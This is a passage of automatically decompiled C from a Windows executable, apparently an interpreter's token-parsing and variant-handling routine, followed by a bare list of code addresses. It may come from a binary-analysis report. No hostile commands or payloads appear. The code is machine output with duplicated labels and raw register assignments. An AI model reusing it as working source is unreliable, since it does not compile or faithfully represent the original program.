																		} else {
																			_t1290 = 1;
																		}
																	}
																	goto L90;
																	L386:
																	__eflags = _t1684;
																	if(_t1684 != 0) {
																		goto L393;
																	}
																	goto L387;
																}
															}
														}
														L371:
														_t1740 =  *( *_t1652);
														__eflags = _t1740 - 0x24;
														if(_t1740 == 0x24) {
															L374:
															_t1778 = _t1778 + 1;
															_t1652 = _t1652 + 4;
															__eflags = _t1652;
															goto L375;
														}
														__eflags = _t1740 - 0x1e;
														if(_t1740 != 0x1e) {
															goto L375;
														}
														_v208 = 0x100;
														_t1177 = _v208;
														goto L374;
													}
												} else {
													_v212 = 3;
													_v108 = _t1444;
													while(1) {
														__eflags = _t1611 - _v208;
														if(_t1611 >= _v208) {
															goto L57;
														}
														_v116 = _v116 + 1;
														_t1308 =  *(_v148 + 4) + _v212 * 4;
														_t1559 =  *_t1308;
														_t1728 = 0;
														_t1411 = 0;
														__eflags =  *(_t1559 + 8);
														if( *(_t1559 + 8) == 0) {
															do {
																_t1561 =  *((intOrPtr*)( *_t1308));
																__eflags = _t1561 - 0x24;
																if(_t1561 != 0x24) {
																	__eflags = _t1561 - 0x1e;
																	if(_t1561 != 0x1e) {
																		_push(0xffffffff);
																		_push(0x91);
																		L623:
																		_push(_a4);
																		goto L624;
																	}
																	_t1728 = 0x100;
																	goto L301;
																}
																_t1411 = 1;
																L301:
																_t1562 =  *((intOrPtr*)(_t1308 + 4));
																_v212 = _v212 + 1;
																_t1308 = _t1308 + 4;
																__eflags =  *((short*)(_t1562 + 8));
															} while ( *((short*)(_t1562 + 8)) == 0);
														}
														_t1697 =  *((intOrPtr*)( *((intOrPtr*)(_a8 + 4)) + _t1611 * 4));
														__eflags =  *((short*)(_t1697 + 8)) - 0x33;
														if( *((short*)(_t1697 + 8)) != 0x33) {
															_t1411 = 0;
															__eflags = 0;
														}
														_t1791 = _v124;
														_t1310 = _v120;
														__eflags = _t1791 - _t1310;
														if(__eflags == 0) {
															_t1311 = _t1310 + _t1310;
															__eflags = _t1311 - 4;
															if(__eflags < 0) {
																_t1311 = 4;
															}
															_v120 = _t1311;
															_push( ~(0 | __eflags > 0x00000000) | _t1311 * 0x00000004);
															_v156 = E004115D7(_t1728, _t1791, __eflags);
															E00410E60(_t1313, _v128, _t1791 * 4);
															_push(_v128);
															E004111DC();
															_t1809 = _t1809 + 0x14;
															_v128 = _v156;
														}
														_push(1);
														_t1317 = E004115D7(_t1728, _t1791, __eflags);
														_t1809 = _t1809 + 4;
														__eflags = _t1317;
														if(_t1317 == 0) {
															_t1317 = 0;
														} else {
															 *_t1317 = _t1411;
														}
														 *(_v128 + _t1791 * 4) = _t1317;
														_t1792 = _t1791 + 1;
														_v124 = _t1791 + 1;
														__eflags = _t1411;
														if(_t1411 != 0) {
															_t1570 = _v144;
															_t1319 =  *((intOrPtr*)( *((intOrPtr*)(_a8 + 4)) + _t1570 * 4));
															__eflags =  *((short*)(_t1319 + 8)) - 0x33;
															if( *((short*)(_t1319 + 8)) != 0x33) {
																_push( *((short*)( *((intOrPtr*)( *((intOrPtr*)(_a8 + 4)) + _t1570 * 4)) + 0xa)));
																_push(0x91);
																_push(_a4);
																goto L624;
															}
															_t1573 = 0;
															_t1322 = E0040C2C0(0,  *_t1319,  &_v200,  &_v204);
															__eflags = _t1322;
															if(_t1322 == 0) {
																_push( *((short*)( *((intOrPtr*)( *((intOrPtr*)(_a8 + 4)) + _v144 * 4)) + 0xa)));
																_push(0x79);
																_push(_a4);
																goto L624;
															}
															__eflags = _v204 & 0x00000100;
															if((_v204 & 0x00000100) == 0) {
																L309:
																_t1325 = _v200;
																_t1728 = 1;
																_v144 = _v144 + 1;
																_v212 = _v212 + 1;
																__eflags =  *((intOrPtr*)(_t1325 + 8)) - 5;
																if( *((intOrPtr*)(_t1325 + 8)) != 5) {
																	L313:
																	E00408F40(_t1728,  &_v196);
																	_v188 = 6;
																	_v196 = _v200;
																	E0040BA10(_t1411, _t1573, _t1728,  &_v180,  &_v196);
																	_t1412 = _v212;
																	goto L51;
																}
																_t1573 = _a8;
																_t1710 =  *((intOrPtr*)( *((intOrPtr*)(_a8 + 4)) + _v144 * 4));
																__eflags =  *((short*)(_t1710 + 8)) - 0x4e;
																if( *((short*)(_t1710 + 8)) != 0x4e) {
																	goto L313;
																}
																_t1341 = E0040C4E0( &_v144, _t1573, _t1851, _a4,  &_v200, 0);
																__eflags = _t1341;
																if(_t1341 == 0) {
																	goto L313;
																}
																E00408F40(1,  &_v196);
																E00430E4D( &_v132);
																E00410C60( &_v180, 1);
																_t946 = 1;
																goto L264;
															}
															__eflags = _t1728 & 0x00000100;
															if((_t1728 & 0x00000100) != 0) {
																goto L309;
															}
															_push( *((short*)( *((intOrPtr*)( *((intOrPtr*)(_a8 + 4)) + _v144 * 4)) + 0xa)));
															_push(0xb0);
															_push(_a4);
															goto L624;
														} else {
															_t1347 = _v184;
															__eflags = _t1347;
															if(_t1347 != 0) {
																E004431AD(_t1347);
																_v188 = 0;
															}
															_t1349 = _v188;
															__eflags = _t1349 - 8;
															if(_t1349 == 8) {
																_t1350 = _v196;
																__eflags = _t1350;
																if(_t1350 != 0) {
																	__imp__#9(_t1350);
																	_push(_v200);
																	E004111DC();
																	_t1809 = _t1809 + 4;
																}
															} else {
																__eflags = _t1349 - 0xa;
																if(_t1349 == 0xa) {
																	_t1369 = _v196;
																	__eflags = _t1369;
																	if(_t1369 != 0) {
																		E0044318E(_t1369);
																	}
																} else {
																	__eflags = _t1349 - 5;
																	if(_t1349 == 5) {
																		E0040E270( &_v196, _t1792);
																	} else {
																		__eflags = _t1349 - 0xb;
																		if(_t1349 == 0xb) {
																			_push( *(_v196 + 4));
																			E004111DC();
																			_push(_v196);
																			E004111DC();
																			_t1809 = _t1809 + 8;
																		} else {
																			__eflags = _t1349 - 0xc;
																			if(_t1349 == 0xc) {
																				_t1376 = _v196;
																				__eflags = _t1376;
																				if(_t1376 != 0) {
																					E0044B3D9(_t1376);
																				}
																			}
																		}
																	}
																}
															}
															_t1799 = _v172;
															_t1351 = _v168;
															_v188 = 1;
															_v196 = 0;
															__eflags = _t1799 - _t1351;
															if(__eflags == 0) {
																_t1352 = _t1351 + _t1351;
																__eflags = _t1352 - 4;
																if(__eflags < 0) {
																	_t1352 = 4;
																}
																_v168 = _t1352;
																_push( ~(0 | __eflags > 0x00000000) | _t1352 * 0x00000004);
																_t1354 = E004115D7(_t1728, _t1799, __eflags);
																_t1413 = _v176;
																_t1755 = _t1354;
																E00410E60(_t1755, _t1413, _t1799 * 4);
																_push(_t1413);
																E004111DC();
																_t1809 = _t1809 + 0x14;
																_v176 = _t1755;
															}
															_t1728 = _v176;
															_push(0x10);
															_t1358 = E004115D7(_t1728, _t1799, __eflags);
															_t1809 = _t1809 + 4;
															__eflags = _t1358;
															if(_t1358 == 0) {
																_t1359 = 0;
																L49:
																_t1412 = _v208;
																 *(_t1728 + _t1799 * 4) = _t1359;
																_v172 = _t1799 + 1;
																_t1361 = E0040A780(_a4, _t1851, _a8,  &_v144,  *((intOrPtr*)(_t1728 + (_t1799 + 1) * 4 - 4)), _t1412);
																__eflags = _t1361;
																if(_t1361 != 0) {
																	L625:
																	E00408F40(_t1728,  &_v196);
																	E00430E4D( &_v132);
																	E00410C60( &_v180, _t1728);
																	_t946 = 1;
																	goto L264;
																} else {
																	_t1362 = _v212;
																	_t1717 =  *((intOrPtr*)( *(_v148 + 4) + 4 + _t1362 * 4));
																	__eflags =  *((short*)(_t1717 + 8)) - 0x41;
																	_v212 = _t1362 + 1;
																	if( *((short*)(_t1717 + 8)) == 0x41) {
																		_v212 = _v212 + 2;
																	}
																	L51:
																	_t1611 = _v144;
																	__eflags = _t1611 - _t1412;
																	if(_t1611 == _t1412) {
																		goto L57;
																	}
																	_t1796 = _a8;
																	_t1330 =  *((intOrPtr*)( *((intOrPtr*)(_t1796 + 4)) + _t1611 * 4));
																	__eflags =  *((intOrPtr*)(_t1330 + 8)) - 0x40;
																	if( *((intOrPtr*)(_t1330 + 8)) != 0x40) {
																		L354:
																		_push( *((short*)( *((intOrPtr*)( *((intOrPtr*)(_t1796 + 4)) + _t1611 * 4)) + 0xa)));
																		_push(0x6f);
																		goto L623;
																	}
																	_t1332 = _t1611 + 1;
																	__eflags = _t1332 - _v208;
																	if(_t1332 == _v208) {
																		goto L354;
																	} else {
																		_t1611 = _t1332;
																		_v144 = _t1611;
																		_t1335 =  *((intOrPtr*)( *(_v148 + 4) + _v212 * 4));
																		__eflags =  *((intOrPtr*)(_t1335 + 8)) - 0x40;
																		if( *((intOrPtr*)(_t1335 + 8)) == 0x40) {
																			_t139 =  &_v212;
																			 *_t139 = _v212 + 1;
																			__eflags =  *_t139;
																		}
																		_t1337 = _v108 + 1;
																		_v108 = _t1337;
																		__eflags = _t1337 - _v136;
																		if(_t1337 < _v136) {
																			continue;
																		}
																		goto L57;
																	}
																}
															}
															_t1414 = _t1358;
															_t1364 = _v188;
															 *(_t1414 + 8) = _t1364;
															 *(_t1414 + 0xc) = 0;
															__eflags = _t1364 - 1;
															if(_t1364 != 1) {
																_t1365 = _t1364 - 1;
																__eflags = _t1365 - 0xb;
																if(__eflags > 0) {
																	L336:
																	_t1728 = _v176;
																	_t1799 = _v172;
																	L48:
																	_t1359 = _t1414;
																	goto L49;
																}
																switch( *((intOrPtr*)(_t1365 * 4 +  &M0042AEAE))) {
																	case 0:
																		goto L47;
																	case 1:
																		__eax = _v196;
																		 *__ebx = _v196;
																		__ecx = _v192;
																		__ebx[1] = __ecx;
																		goto L48;
																	case 2:
																		__fp0 = _v196;
																		 *__ebx = __fp0;
																		goto L48;
																	case 3:
																		_push(0x10);
																		_t1366 = E004115D7(_t1728, _t1799, __eflags);
																		_t1809 = _t1809 + 4;
																		__eflags = _t1366;
																		if(_t1366 == 0) {
																			 *(_t1414 + 0xc) = 0;
																		} else {
																			_t1589 = _v184;
																			 *_t1366 =  *_t1589;
																			 *((intOrPtr*)(_t1366 + 4)) =  *((intOrPtr*)(_t1589 + 4));
																			 *((intOrPtr*)(_t1366 + 8)) =  *((intOrPtr*)(_t1589 + 8));
																			_t1590 =  *((intOrPtr*)(_t1589 + 0xc));
																			 *((intOrPtr*)(_t1366 + 0xc)) = _t1590;
																			 *_t1590 =  *_t1590 + 1;
																			 *(_t1414 + 0xc) = _t1366;
																		}
																		goto L48;
																	case 4:
																		_push(0x214);
																		__eax = E004115D7(__edi, __esi, __eflags);
																		__esp = __esp + 4;
																		__eflags = __eax;
																		if(__eax == 0) {
																			__eax = 0;
																			__eflags = 0;
																		} else {
																			__esi = _v196;
																			__ecx = 0x85;
																			__edi = __eax;
																			__eax = memcpy(__eax, __esi, 0x85 << 2);
																			__edi = __esi + __ecx;
																			__edi = __esi + __ecx + __ecx;
																			__ecx = 0;
																		}
																		 *__ebx = __eax;
																		__eflags =  *(__eax + 4);
																		if( *(__eax + 4) != 0) {
																			__eax =  *(__eax + 4);
																			 *__eax =  *__eax + 1;
																			__eflags =  *__eax;
																		}
																		goto L336;
																	case 5:
																		__eax = _v196;
																		 *__ebx = _v196;
																		goto L48;
																	case 6:
																		__eflags = _v196;
																		if(__eflags == 0) {
																			goto L336;
																		}
																		_push(0x10);
																		__eax = E004115D7(__edi, __esi, __eflags);
																		__esp = __esp + 4;
																		_push(__eax);
																		 *__ebx = __eax;
																		__imp__#8();
																		__ecx = _v200;
																		__edx =  *__ebx;
																		_push(__ecx);
																		_push( *__ebx);
																		__imp__#10();
																		__eflags = __eax;
																		if(__eax < 0) {
																			__eax =  *__ebx;
																			_push( *__ebx);
																			__imp__#9();
																			__ecx =  *__ebx;
																			_push( *__ebx);
																			__eax = E004111DC();
																			__esp = __esp + 4;
																			 *__ebx = 0;
																		}
																		goto L48;
																	case 7:
																		 *__ebx = _v196;
																		goto L48;
																	case 8:
																		_push(0x18);
																		__eax = E004115D7(__edi, __esi, __eflags);
																		__esp = __esp + 4;
																		__eflags = __eax;
																		if(__eax == 0) {
																			goto L343;
																		}
																		__ecx = _v196;
																		 *__ebx = __eax;
																		goto L48;
																	case 9:
																		_push(8);
																		__eax = E004115D7(__edi, __esi, __eflags);
																		 *__ebx = __eax;
																		__edx = _v196;
																		__ecx =  *_v196;
																		 *__eax =  *_v196;
																		__edx =  *__ebx;
																		__eax =  *( *__ebx);
																		__esp = __esp + 4;
																		__eflags = __eax;
																		if(__eflags == 0) {
																			_push(1);
																			__eax = E004115D7(__edi, __esi, __eflags);
																			__ecx =  *__ebx;
																			 *(__ecx + 4) = __eax;
																			__edx =  *__ebx;
																			__eax =  *(__edx + 4);
																			__esp = __esp + 4;
																			 *( *(__edx + 4)) = 0;
																		} else {
																			_push(__eax);
																			__eax = E004115D7(__edi, __esi, __eflags);
																			__ecx =  *__ebx;
																			 *( *__ebx + 4) = __eax;
																			__eax =  *__ebx;
																			__edx =  *__eax;
																			__ecx = _v196;
																			__eax =  *(__eax + 4);
																			__esp = __esp + 4;
																			__edx =  *(_v196 + 4);
																			__eax = E00410E60(__eax,  *(_v196 + 4),  *(_v196 + 4));
																		}
																		goto L48;
																	case 0xa:
																		_push(0x14);
																		__eax = E004115D7(__edi, __esi, __eflags);
																		__esp = __esp + 4;
																		__eflags = __eax;
																		if(__eax == 0) {
																			L343:
																			__eax = 0;
																			 *__ebx = 0;
																			goto L48;
																		}
																		__ecx = _v196;
																		 *__ebx = __eax;
																		goto L48;
																}
															}
															L47:
															 *_t1414 = _v196;
															goto L48;
														}
													}
													goto L57;
												}
											}
											__eflags = _t978 - _t1444;
											if(_t978 <= _t1444) {
												goto L296;
											} else {
												_t1379 = (_t978 << 4) +  *0x4a912c;
												__eflags = _t1379;
												_v148 = _t1379;
												goto L28;
											}
										}
									}
								}
								_t1593 = _v200 + 1;
								__eflags = _t1593;
								_v136 = _t1593;
								goto L287;
							}
							_v116 = _v200 - 1;
							L287:
							__eflags = _v136 - _v116;
						} while (_v136 <= _v116);
						goto L288;
					}
					_t1763 =  *(_t956 + 0x134);
					if(_t1763 != 0) {
						_v200 = _t1763;
						do {
							_t1725 =  *((intOrPtr*)(_t1763 + 4));
							if(_t1725 != _v176) {
								goto L268;
							}
							if(_t1725 == 0) {
								L15:
								_t1382 = _v168;
								 *_t1382 =  *_t1382 - 1;
								if( *_t1382 == 0) {
									_push(_v180);
									E004111DC();
									_push(_v168);
									E004111DC();
									_t1809 = _t1809 + 8;
								}
								goto L17;
							} else {
								_t1595 = _v180;
								_t1385 =  *_t1763;
								L12:
								L12:
								if( *_t1385 !=  *_t1595) {
									_t1763 = _v200;
								} else {
									goto L13;
								}
								goto L268;
								L13:
								_t1385 = _t1385 + 2;
								_t1595 =  &(_t1595[1]);
								_t1725 = _t1725 - 1;
								if(_t1725 != 0) {
									goto L12;
								} else {
									_t1763 = _v200;
									goto L15;
								}
							}
							L268:
							_t1763 =  *(_t1763 + 0x20);
							_v200 = _t1763;
							__eflags = _t1763;
						} while (__eflags != 0);
					}
					goto L288;
				}
			}

































































































































































































































































































                                  0x004096a0
                                  0x004096ad
                                  0x004096b5
                                  0x004096be
                                  0x004096c1
                                  0x004096c6
                                  0x004096c9
                                  0x004096cd
                                  0x004096ce
                                  0x0042978a
                                  0x004096d4
                                  0x004096de
                                  0x004096de
                                  0x004096de
                                  0x004096e2
                                  0x004096f4
                                  0x00409708
                                  0x0040970c
                                  0x00409714
                                  0x00409716
                                  0x0040971b
                                  0x00409720
                                  0x00429794
                                  0x00409726
                                  0x00409726
                                  0x00409726
                                  0x00409736
                                  0x0040973a
                                  0x0042986a
                                  0x0042986e
                                  0x00000000
                                  0x00409740
                                  0x00409743
                                  0x0042979f
                                  0x004297a5
                                  0x004297b0
                                  0x004297c3
                                  0x004297cb
                                  0x004297d5
                                  0x004297e5
                                  0x004297ea
                                  0x004297ed
                                  0x004297ed
                                  0x00409753
                                  0x00409759
                                  0x0040975c
                                  0x00409764
                                  0x00429808
                                  0x00429808
                                  0x00429809
                                  0x00000000
                                  0x00000000
                                  0x0042980f
                                  0x00429817
                                  0x0042981b
                                  0x00429826
                                  0x0042982e
                                  0x0042983b
                                  0x0042983d
                                  0x00429851
                                  0x0042988b
                                  0x0042988f
                                  0x00000000
                                  0x00000000
                                  0x00429895
                                  0x0042989c
                                  0x004097db
                                  0x004097db
                                  0x004097df
                                  0x00429873
                                  0x0042987d
                                  0x0040a65f
                                  0x0040a665
                                  0x0040a665
                                  0x004097eb
                                  0x004097f2
                                  0x004097f4
                                  0x004097f8
                                  0x00409805
                                  0x00409812
                                  0x00409813
                                  0x00409818
                                  0x00409821
                                  0x00409825
                                  0x0040982d
                                  0x00409839
                                  0x00409841
                                  0x00409845
                                  0x00409849
                                  0x0040984d
                                  0x00409855
                                  0x00409859
                                  0x0040985d
                                  0x00409861
                                  0x004297f6
                                  0x004297fa
                                  0x004297fc
                                  0x0042ae84
                                  0x0042ae84
                                  0x00000000
                                  0x00409867
                                  0x00409867
                                  0x00409868
                                  0x0040986c
                                  0x0040986e
                                  0x00409872
                                  0x00409874
                                  0x00409878
                                  0x00409878
                                  0x00409880
                                  0x00409887
                                  0x00409887
                                  0x00409889
                                  0x00409889
                                  0x00409878
                                  0x00409878
                                  0x00409880
                                  0x00409887
                                  0x00409887
                                  0x00000000
                                  0x00409887
                                  0x00000000
                                  0x0040988c
                                  0x0040988c
                                  0x0040988c
                                  0x0040988f
                                  0x004298cf
                                  0x00000000
                                  0x004298cf
                                  0x00409895
                                  0x00409895
                                  0x00409896
                                  0x004298a6
                                  0x004298a9
                                  0x00000000
                                  0x00000000
                                  0x004298bf
                                  0x004298c0
                                  0x004298c2
                                  0x00000000
                                  0x004298c2
                                  0x0040989c
                                  0x0040989e
                                  0x004298c8
                                  0x004298c9
                                  0x00000000
                                  0x004298c9
                                  0x004098a4
                                  0x004098a9
                                  0x004098ab
                                  0x004098b2
                                  0x004098b8
                                  0x004298d5
                                  0x004298d5
                                  0x004098d3
                                  0x004098d3
                                  0x004098d7
                                  0x004098db
                                  0x00409aa2
                                  0x00409aa2
                                  0x00409aa6
                                  0x00409aaa
                                  0x0042ae79
                                  0x0042ae7d
                                  0x0042ae7e
                                  0x00000000
                                  0x0042ae7e
                                  0x00409ab0
                                  0x00409ab4
                                  0x00000000
                                  0x00000000
                                  0x00409aba
                                  0x00409abe
                                  0x00000000
                                  0x00000000
                                  0x00409ac4
                                  0x00409acb
                                  0x00409acf
                                  0x00409ad7
                                  0x00409adb
                                  0x00409adf
                                  0x00409ae3
                                  0x00409ae5
                                  0x00429cf4
                                  0x00429cf4
                                  0x00409aeb
                                  0x00409af1
                                  0x00429cfd
                                  0x00429d03
                                  0x00429d09
                                  0x00429d0f
                                  0x00429d12
                                  0x00409af7
                                  0x00409af7
                                  0x00409af9
                                  0x00409afe
                                  0x00409b01
                                  0x00409b03
                                  0x00429da0
                                  0x00409b09
                                  0x00409b09
                                  0x00409b0b
                                  0x00409b0d
                                  0x00409b11
                                  0x00409b14
                                  0x00409b18
                                  0x00429d1e
                                  0x00429d1e
                                  0x00409b1e
                                  0x00409b22
                                  0x00409b24
                                  0x00429d26
                                  0x00429d28
                                  0x00429d2c
                                  0x00429d31
                                  0x00429d34
                                  0x00429d36
                                  0x00429d47
                                  0x00429d47
                                  0x00429d3c
                                  0x00429d3d
                                  0x00429d3d
                                  0x00429d50
                                  0x00429d52
                                  0x00429d59
                                  0x00429d60
                                  0x00429d68
                                  0x00429d6f
                                  0x00429d74
                                  0x00429d83
                                  0x00429d88
                                  0x00429d94
                                  0x00429d99
                                  0x00409b2a
                                  0x00409b2a
                                  0x00409b2a
                                  0x00409b24
                                  0x00409b2c
                                  0x00409b32
                                  0x00409b35
                                  0x00409b35
                                  0x00409b3b
                                  0x00409b3f
                                  0x00409b45
                                  0x00409b47
                                  0x00429da7
                                  0x00429da9
                                  0x00429dac
                                  0x00429dae
                                  0x00429db9
                                  0x00429db9
                                  0x00429dbe
                                  0x00429dc1
                                  0x00429dc3
                                  0x00429dce
                                  0x00429dce
                                  0x00429dd3
                                  0x00429dd7
                                  0x00429ddd
                                  0x00429de0
                                  0x00429de2
                                  0x00429dea
                                  0x00429dea
                                  0x00429de2
                                  0x00429df0
                                  0x00429df0
                                  0x00409b52
                                  0x00409b56
                                  0x00409fd9
                                  0x00409fd9
                                  0x00409fe5
                                  0x00409fec
                                  0x00409ff3
                                  0x00409ffa
                                  0x0040a001
                                  0x0040a008
                                  0x0040a00f
                                  0x0040a016
                                  0x0040a01f
                                  0x0040a025
                                  0x0040a02c
                                  0x0040a033
                                  0x0040a036
                                  0x0040a03b
                                  0x0040a03f
                                  0x0042a42a
                                  0x0042a42f
                                  0x0040a045
                                  0x0040a045
                                  0x0040a047
                                  0x0040a04c
                                  0x0040a04f
                                  0x0040a051
                                  0x0042a470
                                  0x0040a057
                                  0x0040a057
                                  0x0040a05e
                                  0x0040a061
                                  0x0040a064
                                  0x0040a066
                                  0x0040a069
                                  0x0040a06c
                                  0x0040a06f
                                  0x0040a072
                                  0x0040a075
                                  0x0040a078
                                  0x0040a078
                                  0x0040a07e
                                  0x0040a081
                                  0x0040a081
                                  0x0040a084
                                  0x0040a08f
                                  0x0040a095
                                  0x0040a09c
                                  0x0040a09e
                                  0x0040a0a2
                                  0x0040a0a7
                                  0x0040a0a9
                                  0x0042a477
                                  0x0042a477
                                  0x0042a47c
                                  0x0042a47c
                                  0x00000000
                                  0x0040a0af
                                  0x0040a0af
                                  0x0040a0b3
                                  0x0040a0b7
                                  0x0040a0bd
                                  0x0040a0c0
                                  0x0040a0c5
                                  0x0040a0c9
                                  0x0040a0cc
                                  0x0042a485
                                  0x0042a485
                                  0x0040a0d2
                                  0x0040a0d6
                                  0x0042a6ad
                                  0x0042a6b0
                                  0x0042a6b3
                                  0x0042a6b8
                                  0x0042a6bf
                                  0x00000000
                                  0x0040a0dc
                                  0x0040a0df
                                  0x0040a0e4
                                  0x0040a0e7
                                  0x0040a0ec
                                  0x0040a0f0
                                  0x0042a490
                                  0x0040a0f6
                                  0x0040a0f6
                                  0x0040a0f6
                                  0x0040a0f9
                                  0x0040a0fc
                                  0x0040a0fe
                                  0x0040a18b
                                  0x0040a18b
                                  0x0040a18d
                                  0x0040a190
                                  0x0040a195
                                  0x0040a199
                                  0x0040a19d
                                  0x0042a6a2
                                  0x0042a6a2
                                  0x0040a1a3
                                  0x0040a1a7
                                  0x0042a6cc
                                  0x0042a6d1
                                  0x0042a6d4
                                  0x0042a6d4
                                  0x0040a1ad
                                  0x0040a1b1
                                  0x0042a6e3
                                  0x0040a1b7
                                  0x0040a1b7
                                  0x0040a1b7
                                  0x0040a1ba
                                  0x0040a1be
                                  0x0042a6fd
                                  0x0042a6fd
                                  0x0040a1c4
                                  0x0040a1c9
                                  0x0040a1cc
                                  0x0040a1d1
                                  0x0040a1d5
                                  0x0042a707
                                  0x0042a70a
                                  0x0042a70d
                                  0x0042a70f
                                  0x0042a716
                                  0x0042a716
                                  0x0042a71b
                                  0x0042a71e
                                  0x0042a71e
                                  0x0040a1db
                                  0x0040a1df
                                  0x0042a727
                                  0x00000000
                                  0x0040a1e5
                                  0x0040a1e5
                                  0x0040a1eb
                                  0x0040a1ef
                                  0x0040a1f1
                                  0x0040a2b1
                                  0x0040a2b5
                                  0x0040a2b8
                                  0x0040a2bc
                                  0x0040a2bc
                                  0x0040a2c0
                                  0x0040a2c3
                                  0x0040a2c7
                                  0x0040a2c9
                                  0x0040a2cd
                                  0x0042a84f
                                  0x0042a84f
                                  0x0040a2da
                                  0x0040a2dd
                                  0x0040a2e1
                                  0x0040a2e4
                                  0x0042a857
                                  0x0042a857
                                  0x0040a2ea
                                  0x0040a2f3
                                  0x0040a2f5
                                  0x0040a2f9
                                  0x0040a2fd
                                  0x0042a862
                                  0x0040a303
                                  0x0040a303
                                  0x0040a303
                                  0x0040a306
                                  0x0040a306
                                  0x0040a310
                                  0x0040a312
                                  0x0040a371
                                  0x0040a371
                                  0x00000000
                                  0x0040a314
                                  0x0040a314
                                  0x0040a317
                                  0x0040a319
                                  0x0042a86b
                                  0x0042a870
                                  0x0042a870
                                  0x0040a31f
                                  0x0040a322
                                  0x0040a325
                                  0x0042a87c
                                  0x0042a87e
                                  0x0042a880
                                  0x00000000
                                  0x00000000
                                  0x0042a887
                                  0x0042a88f
                                  0x0042a890
                                  0x0042a895
                                  0x00000000
                                  0x0040a32b
                                  0x0040a32b
                                  0x0040a32b
                                  0x0040a32e
                                  0x0042a89d
                                  0x0042a89f
                                  0x0042a8a1
                                  0x0042a8a8
                                  0x0042a8a8
                                  0x0040a334
                                  0x0040a334
                                  0x0040a337
                                  0x0042a8b4
                                  0x0040a33d
                                  0x0040a33d
                                  0x0040a340
                                  0x0042a8c3
                                  0x0042a8c4
                                  0x0042a8ce
                                  0x0042a8cf
                                  0x0042a8d4
                                  0x0040a346
                                  0x0040a346
                                  0x0040a349
                                  0x0042a8dc
                                  0x0042a8de
                                  0x0042a8e0
                                  0x0042a8e7
                                  0x0042a8e7
                                  0x0042a8e0
                                  0x0040a349
                                  0x0040a340
                                  0x0040a337
                                  0x0040a34f
                                  0x0040a34f
                                  0x0040a356
                                  0x0040a35c
                                  0x0040a35f
                                  0x0040a362
                                  0x0042a8f1
                                  0x0042a8f2
                                  0x0042a8f5
                                  0x00000000
                                  0x00000000
                                  0x0042a8fb
                                  0x00000000
                                  0x00000000
                                  0x00000000
                                  0x0042a910
                                  0x0042a912
                                  0x00000000
                                  0x00000000
                                  0x0042a91a
                                  0x0042a921
                                  0x00000000
                                  0x00000000
                                  0x0042a928
                                  0x0042a92a
                                  0x0042a92f
                                  0x0042a932
                                  0x0042a934
                                  0x0042a961
                                  0x0042a963
                                  0x0042a93a
                                  0x0042a93a
                                  0x0042a941
                                  0x0042a943
                                  0x0042a945
                                  0x0042a948
                                  0x0042a94b
                                  0x0042a94e
                                  0x0042a951
                                  0x0042a954
                                  0x0042a957
                                  0x0042a959
                                  0x0042a959
                                  0x00000000
                                  0x00000000
                                  0x0042a979
                                  0x0042a97e
                                  0x0042a983
                                  0x0042a986
                                  0x0042a988
                                  0x0042a9a3
                                  0x0042a9a3
                                  0x0042a98e
                                  0x0042a98e
                                  0x0042a995
                                  0x0042a99a
                                  0x0042a99c
                                  0x0042a99c
                                  0x0042a99c
                                  0x0042a99c
                                  0x0042a9a5
                                  0x0042a9a9
                                  0x0042a9ab
                                  0x0042a9af
                                  0x0042a9b5
                                  0x0042a9b8
                                  0x0042a9b8
                                  0x0040a375
                                  0x0040a375
                                  0x0040a379
                                  0x0040a37d
                                  0x0042aad7
                                  0x0040a383
                                  0x0040a383
                                  0x0040a383
                                  0x0040a386
                                  0x0040a38a
                                  0x0040a391
                                  0x0042aadf
                                  0x0042aae4
                                  0x0042aae8
                                  0x0042aaed
                                  0x0042aaef
                                  0x0042aaf5
                                  0x0040a397
                                  0x0040a397
                                  0x0040a397
                                  0x0040a39d
                                  0x0040a3a4
                                  0x0042ab01
                                  0x0042ab05
                                  0x00000000
                                  0x0040a3aa
                                  0x0040a3aa
                                  0x0040a3af
                                  0x0040a3b3
                                  0x0040a3b7
                                  0x0040a3b9
                                  0x0040a485
                                  0x0040a489
                                  0x0040a48d
                                  0x0040a48e
                                  0x0040a497
                                  0x0040a49a
                                  0x0040a4a0
                                  0x0040a4a7
                                  0x0040a4ae
                                  0x0040a4b7
                                  0x0040a4bd
                                  0x0040a4c4
                                  0x0040a4c6
                                  0x0042abb0
                                  0x0042abb5
                                  0x0042abb5
                                  0x0040a4cc
                                  0x0040a4d3
                                  0x0040a4d6
                                  0x0042abc5
                                  0x0042abcc
                                  0x0042abce
                                  0x0042abd4
                                  0x0042abd5
                                  0x0042abdb
                                  0x0042abdc
                                  0x0042abe1
                                  0x0042abe1
                                  0x0040a4dc
                                  0x0040a4dc
                                  0x0040a4df
                                  0x0042abe9
                                  0x0042abf0
                                  0x0042abf2
                                  0x0042abf9
                                  0x0042abf9
                                  0x0040a4e5
                                  0x0040a4e5
                                  0x0040a4e8
                                  0x0042ac0a
                                  0x0040a4ee
                                  0x0040a4ee
                                  0x0040a4f1
                                  0x0042ac14
                                  0x0042ac1e
                                  0x0042ac1f
                                  0x0042ac27
                                  0x0042ac28
                                  0x0042ac2d
                                  0x0040a4f7
                                  0x0040a4f7
                                  0x0040a4fa
                                  0x0042ac35
                                  0x0042ac3c
                                  0x0042ac3e
                                  0x0042ac45
                                  0x0042ac45
                                  0x0042ac3e
                                  0x0040a4fa
                                  0x0040a4f1
                                  0x0040a4e8
                                  0x0040a4df
                                  0x0040a500
                                  0x0040a507
                                  0x0040a50e
                                  0x0040a515
                                  0x0040a51c
                                  0x0040a523
                                  0x0040a525
                                  0x0042ac50
                                  0x0042ac55
                                  0x0042ac60
                                  0x0042ac65
                                  0x0042ac65
                                  0x0040a52b
                                  0x0040a52e
                                  0x0042ac6c
                                  0x0042ac73
                                  0x0042ac79
                                  0x0042ac80
                                  0x0042ac81
                                  0x0042ac87
                                  0x0042ac88
                                  0x0042ac8d
                                  0x0042ac90
                                  0x0042ac95
                                  0x0042ac95
                                  0x0040a534
                                  0x0040a534
                                  0x0040a537
                                  0x0042ac9c
                                  0x0042aca3
                                  0x0042acb1
                                  0x0042acb6
                                  0x0042acbb
                                  0x0042acbb
                                  0x0040a53d
                                  0x0040a53d
                                  0x0040a540
                                  0x0042acc9
                                  0x0042acce
                                  0x0042acd3
                                  0x0040a546
                                  0x0040a546
                                  0x0040a549
                                  0x0042acda
                                  0x0042ace4
                                  0x0042ace5
                                  0x0042aced
                                  0x0042acee
                                  0x0042acf3
                                  0x0042acf6
                                  0x0042acfb
                                  0x0040a54f
                                  0x0040a54f
                                  0x0040a552
                                  0x0042ad02
